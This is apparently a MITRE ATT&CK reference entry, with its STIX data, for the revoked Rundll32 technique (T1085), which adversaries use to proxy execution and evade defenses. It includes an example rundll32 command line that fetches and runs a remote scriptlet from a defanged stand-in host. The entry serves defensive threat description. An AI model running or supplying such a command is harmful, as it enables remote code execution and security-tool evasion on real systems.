MITRE ATT&CK Technique
Description
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Supported Platforms
Created
April 29, 2026
Last Updated
April 29, 2026
STIX Data
{'created': '2017-05-31T21:31:06.045Z',
'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
'description': 'The rundll32.exe program can be called to execute an '
'arbitrary binary. Adversaries may take advantage of this '
'functionality to proxy execution of code to avoid triggering '
'security tools that may not monitor execution of the '
'rundll32.exe process because of whitelists or false positives '
'from Windows using rundll32.exe for normal operations.\n'
'\n'
'Rundll32.exe can be used to execute Control Panel Item files '
'(.cpl) through the undocumented shell32.dll functions '
'<code>Control_RunDLL</code> and '
'<code>Control_RunDLLAsUser</code>. Double-clicking a .cpl '
'file also causes rundll32.exe to execute. (Citation: Trend '
'Micro CPL)\n'
'\n'
'Rundll32 can also been used to execute scripts such as '
'JavaScript. This can be done using a syntax similar to this: '
'<code>rundll32.exe '
'javascript:"\\..\\mshtml,RunHTMLApplication '
'";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code> '
'This behavior has been seen used by malware such as Poweliks. '
'(Citation: This is Security Command Line Confusion)',
'external_references': [{'external_id': 'T1085',
'source_name': 'mitre-attack',
'url': 'https://attack.mitre.org/techniques/T1085'},
{'description': 'Merces, F. (2014). CPL Malware '
'Malicious Control Panel Items. '
'Retrieved November 1, 2017.',
'source_name': 'Trend Micro CPL',
'url': 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'},
{'description': 'B. Ancel. (2014, August 20). '
'Poweliks – Command Line Confusion. '
'Retrieved March 5, 2018.',
'source_name': 'This is Security Command Line '
'Confusion',
'url': 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'}],
'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5',
'kill_chain_phases': [{'kill_chain_name': 'mitre-attack',
'phase_name': 'defense-evasion'},
{'kill_chain_name': 'mitre-attack',
'phase_name': 'execution'}],
'modified': '2025-10-24T17:48:51.548Z',
'name': 'Rundll32',
'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],
'revoked': True,
'spec_version': '2.1',
'type': 'attack-pattern',
'x_mitre_attack_spec_version': '3.2.0',
'x_mitre_contributors': ['Ricardo Dias', 'Casey Smith'],
'x_mitre_deprecated': False,
'x_mitre_detection': '',
'x_mitre_domains': ['enterprise-attack'],
'x_mitre_is_subtechnique': False,
'x_mitre_modified_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',
'x_mitre_platforms': ['Windows'],
'x_mitre_version': '1.2'}